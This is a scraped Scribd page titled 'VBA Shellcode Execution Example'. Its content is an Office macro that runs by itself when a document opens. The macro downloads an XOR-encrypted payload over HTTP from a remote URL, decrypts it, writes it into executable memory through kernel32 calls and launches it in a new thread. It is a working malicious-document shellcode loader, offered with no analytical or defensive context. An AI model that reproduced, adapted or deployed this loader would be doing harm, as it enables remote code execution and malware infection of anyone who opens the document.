Scribd
Upload
31 views2 pages

VBA Shellcode Execution Example

Uploaded by

jurryabbas132
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
31 views2 pages

VBA Shellcode Execution Example

Uploaded by

jurryabbas132
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

#If VBA7 Then

Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _


ByVal lpAddress As LongPtr, _
ByVal dwSize As Long, _
ByVal flAllocationType As Long, _
ByVal flProtect As Long) As LongPtr

Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" Alias


"RtlMoveMemory" ( _
ByVal Destination As LongPtr, _
ByRef Source As Any, _
ByVal Length As Long) As Long

Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _


ByVal lpThreadAttributes As LongPtr, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As LongPtr, _
ByVal lpParameter As LongPtr, _
ByVal dwCreationFlags As Long, _
ByRef lpThreadId As Long) As LongPtr
#End If

Sub AutoOpen()
ExecutePayload
End Sub

Sub Document_Open()
ExecutePayload
End Sub

Sub ExecutePayload()
Dim url As String
Dim http As Object
Dim shellcode() As Byte
Dim i As Long
Dim mem As LongPtr
Dim threadID As Long
Dim xorKey As Byte

url = "[Link]
xorKey = &H55 ' Must match the key used in XOR encryption

Set http = CreateObject("[Link]")


[Link] "GET", url, False
[Link]

If [Link] = 200 Then


shellcode = [Link]

' XOR decrypt


For i = 0 To UBound(shellcode)
shellcode(i) = shellcode(i) Xor xorKey
Next i

' Allocate memory and copy shellcode


mem = VirtualAlloc(0, UBound(shellcode), &H1000 Or &H2000, &H40)
RtlMoveMemory mem, shellcode(0), UBound(shellcode)

' Run shellcode


CreateThread 0, 0, mem, 0, 0, threadID
End If
End Sub

You might also like